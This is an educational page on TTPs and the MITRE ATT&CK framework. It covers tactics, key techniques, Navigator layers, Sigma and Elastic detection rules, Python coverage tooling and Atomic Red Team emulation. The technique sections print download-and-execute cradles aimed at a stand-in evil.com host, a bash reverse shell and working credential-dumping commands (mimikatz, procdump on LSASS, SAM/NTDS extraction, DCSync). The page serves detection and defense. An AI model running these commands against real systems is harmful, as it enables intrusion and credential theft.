TTPs & MITRE ATT&CK

Tactics, Techniques, and Procedures (TTPs) describe how adversaries operate. The MITRE ATT&CK framework provides a comprehensive knowledge base for understanding and categorizing adversary behavior.

Why TTPs Matter

IOCs such as IP addresses, domains and file hashes are cheap for an adversary to rotate; TTPs describe the underlying behaviors, which are far more costly to change (the top of David Bianco's Pyramid of Pain). Detections keyed on TTPs therefore keep working long after the indicators from a given campaign have gone stale.

MITRE ATT&CK Overview

ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a globally accessible knowledge base of real-world adversary behaviors, curated by MITRE from public threat reporting. It is organized into:

Tactics

The "why" - adversary's tactical objectives (e.g., Initial Access, Persistence)

Techniques

The "how" - methods used to achieve objectives (e.g., Phishing, Valid Accounts)

Sub-Techniques

Specific variations of techniques (e.g., Spearphishing Attachment)

ATT&CK Tactics (Enterprise)

The 14 tactics represent the adversary's goals throughout the attack lifecycle. The technique counts below reflect one Enterprise release and change with every ATT&CK version, so check attack.mitre.org for the current matrix before quoting them:

TA0043: Reconnaissance

Gathering information to plan future operations

10 Techniques

Examples: Active Scanning, Search Open Websites/Domains, Gather Victim Identity Information

TA0042: Resource Development

Establishing resources to support operations

8 Techniques

Examples: Acquire Infrastructure, Develop Capabilities, Establish Accounts

TA0001: Initial Access

Gaining initial foothold in the network

9 Techniques

Examples: Phishing, Exploit Public-Facing Application, Valid Accounts

TA0002: Execution

Running attacker-controlled code

14 Techniques

Examples: Command and Scripting Interpreter, User Execution, Windows Management Instrumentation

TA0003: Persistence

Maintaining access across restarts and credential changes

19 Techniques

Examples: Boot or Logon Autostart Execution, Scheduled Task/Job, Account Manipulation

TA0004: Privilege Escalation

Gaining higher-level permissions

13 Techniques

Examples: Exploitation for Privilege Escalation, Valid Accounts, Access Token Manipulation

TA0005: Defense Evasion

Avoiding detection throughout the attack

42 Techniques

Examples: Obfuscated Files or Information, Indicator Removal, Masquerading, Process Injection

TA0006: Credential Access

Stealing credentials like account names and passwords

17 Techniques

Examples: OS Credential Dumping, Brute Force, Unsecured Credentials, Input Capture

TA0007: Discovery

Understanding the environment and what can be controlled

31 Techniques

Examples: Account Discovery, System Information Discovery, Network Service Discovery

TA0008: Lateral Movement

Moving through the environment to reach targets

9 Techniques

Examples: Remote Services, Lateral Tool Transfer, Use Alternate Authentication Material

TA0009: Collection

Gathering data of interest to the adversary's goals

17 Techniques

Examples: Data from Local System, Screen Capture, Email Collection, Archive Collected Data

TA0011: Command and Control

Communicating with compromised systems

16 Techniques

Examples: Application Layer Protocol, Encrypted Channel, Proxy, Web Service

TA0010: Exfiltration

Stealing data from the network

9 Techniques

Examples: Exfiltration Over C2 Channel, Exfiltration Over Web Service, Automated Exfiltration

TA0040: Impact

Manipulating, interrupting, or destroying systems and data

14 Techniques

Examples: Data Destruction, Data Encrypted for Impact, Defacement, Service Stop

Key Techniques Deep Dive

T1566: Phishing

One of the most common initial access techniques. Adversaries send messages with malicious attachments or links to gain access to victim systems.

T1566.001

Spearphishing Attachment

Malicious files sent via email (Office docs, PDFs, executables)

T1566.002

Spearphishing Link

Links to credential harvesting pages or drive-by downloads

T1566.003

Spearphishing via Service

Phishing through social media, messaging apps, or collaboration tools

T1059: Command and Scripting Interpreter

Adversaries abuse command-line interpreters and scripting languages to execute commands, scripts, or binaries.

bash
# T1059.001 - PowerShell
powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"

# T1059.003 - Windows Command Shell
cmd.exe /c "certutil -urlcache -split -f http://evil.com/malware.exe C:\Windows\Temp\malware.exe && C:\Windows\Temp\malware.exe"

# T1059.004 - Unix Shell
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1

# T1059.005 - Visual Basic
mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -ep bypass -c IEX(malware)"",0:close")

T1003: OS Credential Dumping

Extracting credentials from the operating system to enable lateral movement and privilege escalation. The LSASS, SAM and NTDS.dit methods below need local administrator rights (SeDebugPrivilege or SYSTEM) on the host; DCSync needs the domain replication rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) that Domain Admins and domain controllers hold by default.

T1003.001: LSASS Memory

powershell
# Mimikatz
sekurlsa::logonpasswords

# Procdump
procdump.exe -ma lsass.exe lsass.dmp

# comsvcs.dll
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [LSASS_PID] dump.bin full

T1003.002: SAM Database

powershell
# Registry dump
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
reg save HKLM\SECURITY security.hive

# Secretsdump
secretsdump.py -sam sam.hive -system system.hive LOCAL

T1003.003: NTDS.dit

powershell
# Volume Shadow Copy (vssadmin prints the HarddiskVolumeShadowCopyN index it created; use that one)
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit
reg save HKLM\SYSTEM C:\temp\system.hive

# Secretsdump (the SYSTEM hive supplies the boot key needed to decrypt the database)
secretsdump.py -ntds ntds.dit -system system.hive LOCAL

T1003.006: DCSync

powershell
# Mimikatz
lsadump::dcsync /domain:corp.local /user:administrator

# Impacket
secretsdump.py corp.local/admin:password@dc01.corp.local -just-dc-user administrator

T1055: Process Injection

Injecting code into the address space of another, usually legitimate, process so that it runs under that process's identity: this evades process-based defenses and, when the target runs with higher privileges, can also elevate the adversary's access.

Common Injection Types

  • T1055.001: DLL Injection
  • T1055.002: Portable Executable Injection
  • T1055.003: Thread Execution Hijacking
  • T1055.004: Asynchronous Procedure Call
  • T1055.012: Process Hollowing

Detection Focus

  • CreateRemoteThread API calls
  • WriteProcessMemory operations
  • Unusual parent-child process relationships
  • Memory regions with RWX permissions
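The detection-focus indicators above as executable checks, an added example rather than code from the original page: it runs over constructed Sysmon-style events (Event ID 1 ProcessCreate, 8 CreateRemoteThread, 10 ProcessAccess), and the event contents, the OFFICE_APPS and INTERPRETERS lists and the file paths are assumptions made for the example.

```python
"""Added example: process-injection and LSASS-access checks over constructed
Sysmon-style events. Event IDs and field names follow Sysmon (1 = ProcessCreate,
8 = CreateRemoteThread, 10 = ProcessAccess); the events themselves are made up."""
from typing import Any, Callable, Dict, List, Optional

Event = Dict[str, Any]
Alert = Dict[str, str]

# Constructed sample telemetry, not real logs
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"EventID": 8, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\loader.exe",
     "TargetImage": r"C:\Windows\explorer.exe",
     "StartAddress": "0x00007FFE12340000", "StartModule": "", "StartFunction": ""},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\conhost.exe",
     "StartAddress": "0x00007FFE9A1C2F40",
     "StartModule": r"C:\Windows\System32\ntdll.dll", "StartFunction": "RtlUserThreadStart"},
    {"EventID": 10, "SourceImage": r"C:\Windows\Temp\procdump64.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Interpreter image name -> the T1059 sub-technique it maps to (assumed mapping)
INTERPRETERS = {"powershell.exe": "T1059.001", "cmd.exe": "T1059.003",
                "wscript.exe": "T1059.005", "cscript.exe": "T1059.005"}
PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_parent_child(ev: Event) -> Optional[Alert]:
    # Unusual parent-child relationship: an Office application spawning an interpreter
    child, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    if parent in OFFICE_APPS and child in INTERPRETERS:
        return {"technique": INTERPRETERS[child], "reason": f"{parent} spawned {child}"}
    return None


def check_remote_thread(ev: Event) -> Optional[Alert]:
    # CreateRemoteThread whose start address is not backed by a module on disk:
    # the new thread begins in memory the source process wrote itself
    if not ev.get("StartModule"):
        return {"technique": "T1055",
                "reason": f"{basename(ev['SourceImage'])} started a thread in "
                          f"{basename(ev['TargetImage'])} at unbacked {ev['StartAddress']}"}
    return None


def check_lsass_access(ev: Event) -> Optional[Alert]:
    # Every LSASS dumper needs PROCESS_VM_READ in the granted mask; 0x1000
    # (PROCESS_QUERY_LIMITED_INFORMATION) alone is routine noise from svchost etc.
    if basename(ev["TargetImage"]) != "lsass.exe":
        return None
    if int(ev["GrantedAccess"], 16) & PROCESS_VM_READ:
        return {"technique": "T1003.001",
                "reason": f"{basename(ev['SourceImage'])} opened lsass.exe with {ev['GrantedAccess']}"}
    return None


CHECKS: Dict[int, Callable[[Event], Optional[Alert]]] = {
    1: check_parent_child, 8: check_remote_thread, 10: check_lsass_access}


def run_detections(events: List[Event]) -> List[Alert]:
    alerts: List[Alert] = []
    for ev in events:
        check = CHECKS.get(ev["EventID"])
        hit = check(ev) if check else None
        if hit:
            alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(f"{alert['technique']}: {alert['reason']}")
```

Three of the four indicators map directly onto Sysmon events as shown; the RWX-region indicator does not, since it needs a memory scanner on the host rather than a log event. The WriteProcessMemory indicator is likewise invisible to Sysmon on its own and usually surfaces through the CreateRemoteThread or process-access event that follows it.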

Using ATT&CK Navigator

The ATT&CK Navigator is a web-based tool for annotating and exploring ATT&CK matrices.

json
# Create a layer file for a threat actor's TTPs
# Example: APT29 layer (simplified); "layer" is the layer-format version Navigator 4.9.x expects
{
  "name": "APT29 TTPs",
  "versions": {
    "attack": "14",
    "navigator": "4.9.1",
    "layer": "4.5"
  },
  "domain": "enterprise-attack",
  "description": "APT29 techniques from MITRE ATT&CK",
  "techniques": [
    {"techniqueID": "T1566.001", "score": 1, "color": "#ff6666"},
    {"techniqueID": "T1059.001", "score": 1, "color": "#ff6666"},
    {"techniqueID": "T1078", "score": 1, "color": "#ff6666"},
    {"techniqueID": "T1195.002", "score": 1, "color": "#ff0000"},
    {"techniqueID": "T1003.003", "score": 1, "color": "#ff6666"}
  ]
}

Query ATT&CK with Python

python
from mitreattack.stix20 import MitreAttackData

# Load the Enterprise STIX bundle (enterprise-attack.json from the
# mitre-attack/attack-stix-data repository; pip install mitreattack-python)
mitre_attack = MitreAttackData("enterprise-attack.json")

# Get all techniques for a specific tactic (tactic short name, then domain)
initial_access = mitre_attack.get_techniques_by_tactic(
    "initial-access", "enterprise-attack", remove_revoked_deprecated=True)
for tech in initial_access:
    # The first external reference of an attack-pattern is its ATT&CK ID
    print(f"{tech.external_references[0].external_id}: {tech.name}")

# Get techniques used by a specific group (APT29, G0016) by STIX ID.
# Each entry is a dict: the technique under "object", the "uses" relationships under "relationships"
apt29_techniques = mitre_attack.get_techniques_used_by_group("intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542")
for entry in apt29_techniques:
    print(entry["object"].name)

# Get mitigations for a technique: resolve the STIX ID from the ATT&CK ID (T1566 Phishing)
phishing = mitre_attack.get_object_by_attack_id("T1566", "attack-pattern")
mitigations = mitre_attack.get_mitigations_mitigating_technique(phishing.id)
for m in mitigations:
    print(f"{m['object'].name}: {m['object'].description}")

Detection & Hunting by TTP

Map detection rules to specific ATT&CK techniques for coverage analysis:

yaml
# Sigma rule with ATT&CK tagging
title: Suspicious PowerShell Download Cradle
status: experimental
description: Detects PowerShell download cradle techniques
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'powershell'
            - 'IEX'
            - 'Net.WebClient'
    condition: selection
tags:
    - attack.execution
    - attack.t1059.001
    - attack.command_and_control
    - attack.t1105
level: high

json
# Elastic detection rule example (EQL over process-creation telemetry).
# It matches the procdump and comsvcs.dll dump methods from the T1003.001 section;
# a rule on process-access telemetry (Sysmon Event ID 10 targeting lsass.exe)
# also catches dump tools this name/argument list does not know about.
{
  "name": "LSASS Memory Dump via Command Line",
  "rule_id": "uuid-here",
  "type": "eql",
  "language": "eql",
  "index": ["logs-endpoint.events.process-*", "winlogbeat-*"],
  "risk_score": 73,
  "severity": "high",
  "threat": [
    {
      "framework": "MITRE ATT&CK",
      "tactic": {
        "id": "TA0006",
        "name": "Credential Access",
        "reference": "https://attack.mitre.org/tactics/TA0006/"
      },
      "technique": [
        {
          "id": "T1003",
          "name": "OS Credential Dumping",
          "reference": "https://attack.mitre.org/techniques/T1003/",
          "subtechnique": [
            {
              "id": "T1003.001",
              "name": "LSASS Memory",
              "reference": "https://attack.mitre.org/techniques/T1003/001/"
            }
          ]
        }
      ]
    }
  ],
  "query": "process where event.type == \"start\" and ((process.name : (\"procdump.exe\", \"procdump64.exe\") and process.args : \"lsass*\") or (process.name : \"rundll32.exe\" and process.args : \"*comsvcs.dll*\" and process.args : \"MiniDump\"))"
}
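The mapping from rule to technique in action, as an added example that is not part of the original page: a minimal evaluator for Sigma-style rules, run over constructed process_creation events, that returns the ATT&CK technique IDs carried in each matching rule's tags. The download-cradle rule is the one above, transcribed into a dict so no YAML parser is needed; the certutil rule, the event contents and the image paths are assumptions added for the example, and only the string modifiers this page uses (contains, contains|all, endswith) are implemented.

```python
"""Added example: evaluate Sigma-style rules against process_creation events
and report the ATT&CK technique tags of every rule that fires."""
import re
from typing import Any, Dict, List

Rule = Dict[str, Any]
Event = Dict[str, str]

# The page's Sigma rule, transcribed field-for-field into a dict
CRADLE_RULE: Rule = {
    "title": "Suspicious PowerShell Download Cradle",
    "detection": {
        "selection": {"CommandLine|contains|all": ["powershell", "IEX", "Net.WebClient"]},
        "condition": "selection",
    },
    "tags": ["attack.execution", "attack.t1059.001",
             "attack.command_and_control", "attack.t1105"],
}

# Added rule for the certutil download shown under T1059.003 (assumed, not from the page)
CERTUTIL_RULE: Rule = {
    "title": "Certutil URL Cache Download",
    "detection": {
        "selection": {"Image|endswith": "\\certutil.exe",
                      "CommandLine|contains|all": ["urlcache", "http"]},
        "condition": "selection",
    },
    "tags": ["attack.command_and_control", "attack.t1105"],
}

RULES: List[Rule] = [CRADLE_RULE, CERTUTIL_RULE]

# Constructed events; the first two command lines are the T1059 examples from above
EVENTS: List[Event] = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "
                    "\"IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')\""},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://evil.com/malware.exe C:\Windows\Temp\malware.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
]


def _matches(value: str, modifiers: List[str], patterns: List[str]) -> bool:
    # Sigma string matching is case-insensitive; 'all' turns the list from OR into AND
    value = value.lower()
    patterns = [p.lower() for p in patterns]
    if "contains" in modifiers:
        tests = [p in value for p in patterns]
    elif "endswith" in modifiers:
        tests = [value.endswith(p) for p in patterns]
    elif "startswith" in modifiers:
        tests = [value.startswith(p) for p in patterns]
    else:
        tests = [value == p for p in patterns]
    return all(tests) if "all" in modifiers else any(tests)


def selection_matches(selection: Dict[str, Any], event: Event) -> bool:
    # Every field condition inside one selection map must hold (AND)
    for key, patterns in selection.items():
        field, *modifiers = key.split("|")
        if field not in event:
            return False
        if not isinstance(patterns, list):
            patterns = [patterns]
        if not _matches(str(event[field]), modifiers, [str(p) for p in patterns]):
            return False
    return True


def rule_matches(rule: Rule, event: Event) -> bool:
    detection = rule["detection"]
    condition = detection["condition"].strip()
    # Only a condition naming a single selection is supported here
    if not re.fullmatch(r"\w+", condition):
        raise NotImplementedError(f"condition not supported: {condition}")
    return selection_matches(detection[condition], event)


def technique_ids(rule: Rule) -> List[str]:
    # attack.t1059.001 -> T1059.001; tactic tags such as attack.execution are dropped
    return [t.split(".", 1)[1].upper() for t in rule["tags"]
            if re.fullmatch(r"attack\.t\d{4}(\.\d{3})?", t)]


def run_rules(rules: List[Rule], events: List[Event]) -> List[Dict[str, Any]]:
    hits = []
    for index, event in enumerate(events):
        for rule in rules:
            if rule_matches(rule, event):
                hits.append({"event": index, "rule": rule["title"],
                             "techniques": technique_ids(rule)})
    return hits


if __name__ == "__main__":
    for hit in run_rules(RULES, EVENTS):
        print(f"event {hit['event']}: {hit['rule']} -> {', '.join(hit['techniques'])}")
```

The third event, an ordinary scheduled PowerShell script, fires nothing because the cradle rule requires all three substrings; that is the property to preserve when you loosen a rule to catch obfuscated cradles. The technique IDs that technique_ids extracts are the same ones a coverage layer is built from.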

Coverage Gap Analysis

Use ATT&CK Navigator to visualize your detection coverage. Create layers showing which techniques you can detect, then overlay threat actor TTPs to identify gaps. Prioritize detection development for techniques commonly used by adversaries targeting your industry.
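The gap analysis just described as code, an added example that is not part of the original page: it scores each technique an actor uses against the technique IDs your rules are tagged with, emits the result as a Navigator layer you can open with "Open Existing Layer", and ranks the uncovered techniques by how many tracked actors use them. The APT29 technique list is the one from the simplified layer above; the second actor's list, the DETECTED set, the colors and the partial-coverage rule are assumptions made for the example.

```python
"""Added example: ATT&CK detection coverage gap analysis with a Navigator layer as output."""
import json
from collections import Counter
from typing import Dict, List, Tuple

# Technique IDs per actor. APT29's list is the one from the layer above; the second
# actor's list is constructed for the example and is not real reporting.
ACTORS: Dict[str, List[str]] = {
    "APT29": ["T1566.001", "T1059.001", "T1078", "T1195.002", "T1003.003"],
    "Actor B (constructed)": ["T1566.001", "T1059.001", "T1003.001", "T1021.001"],
}
# Technique tags collected from the rules in a detection repository (constructed)
DETECTED: List[str] = ["T1059.001", "T1105", "T1003.001", "T1078.002"]

COLORS = {"full": "#31a354", "partial": "#fdae6b", "none": "#e34a33"}
SCORES = {"full": 2, "partial": 1, "none": 0}


def parent(tid: str) -> str:
    return tid.split(".")[0]


def coverage_state(tid: str, detected: List[str]) -> str:
    """full: a rule is tagged with this exact ID.
    partial: a rule is tagged with the parent technique (it may or may not catch this
    sub-technique) or with one of this technique's sub-techniques.
    none: nothing is tagged for it."""
    detected_set = set(detected)
    if tid in detected_set:
        return "full"
    if parent(tid) in detected_set:
        return "partial"
    if any(parent(d) == tid and d != tid for d in detected_set):
        return "partial"
    return "none"


def gap_report(actor_techniques: List[str], detected: List[str]) -> Dict[str, str]:
    return {tid: coverage_state(tid, detected) for tid in actor_techniques}


def build_layer(name: str, actor_techniques: List[str], detected: List[str],
                attack_version: str = "14") -> Dict:
    # Layer format 4.5 is the one Navigator 4.9.x reads
    report = gap_report(actor_techniques, detected)
    return {
        "name": name,
        "versions": {"attack": attack_version, "navigator": "4.9.1", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": "Detection coverage over actor techniques: 2 = covered, 1 = partial, 0 = gap",
        "techniques": [{"techniqueID": tid, "score": SCORES[state],
                        "color": COLORS[state], "comment": f"coverage: {state}"}
                       for tid, state in report.items()],
        "legendItems": [{"label": state, "color": color} for state, color in COLORS.items()],
    }


def prioritized_gaps(actors: Dict[str, List[str]], detected: List[str]) -> List[Tuple[str, int]]:
    # Uncovered techniques ranked by how many tracked actors use them, then by ID
    counts: Counter = Counter()
    for techniques in actors.values():
        for tid, state in gap_report(techniques, detected).items():
            if state == "none":
                counts[tid] += 1
    return sorted(counts.items(), key=lambda item: (-item[1], item[0]))


if __name__ == "__main__":
    layer = build_layer("APT29 vs detection coverage", ACTORS["APT29"], DETECTED)
    with open("apt29_coverage_layer.json", "w", encoding="utf-8") as fh:
        json.dump(layer, fh, indent=2)
    for tid, n in prioritized_gaps(ACTORS, DETECTED):
        print(f"{tid}: used by {n} actor(s), no detection")
```

A rule tagged only with a parent technique is scored partial rather than full on purpose: a T1078 rule that looks at domain logons says nothing about T1078.004 cloud accounts, so counting it as full coverage hides exactly the gap this exercise is meant to find.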

Adversary Emulation with TTPs

Use documented TTPs to create realistic attack simulations. Atomic tests perform the real technique (the T1003.001 atomics dump LSASS memory with procdump and comsvcs.dll), so run them only on isolated lab hosts or with explicit approval, and expect your EDR to react:

powershell
# Atomic Red Team - Test specific techniques
# https://github.com/redcanaryco/atomic-red-team

# Install the Invoke-AtomicRedTeam module, then fetch the atomics (the test definitions)
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)
Install-AtomicRedTeam -getAtomics

# List tests for a technique
Invoke-AtomicTest T1003.001 -ShowDetailsBrief

# Check, then install, the prerequisites of a test before running it
Invoke-AtomicTest T1003.001 -TestNumbers 1 -CheckPrereqs
Invoke-AtomicTest T1003.001 -TestNumbers 1 -GetPrereqs

# Execute a specific test
Invoke-AtomicTest T1003.001 -TestNumbers 1

# Execute all tests for a technique
Invoke-AtomicTest T1059.001

# Cleanup after testing
Invoke-AtomicTest T1003.001 -Cleanup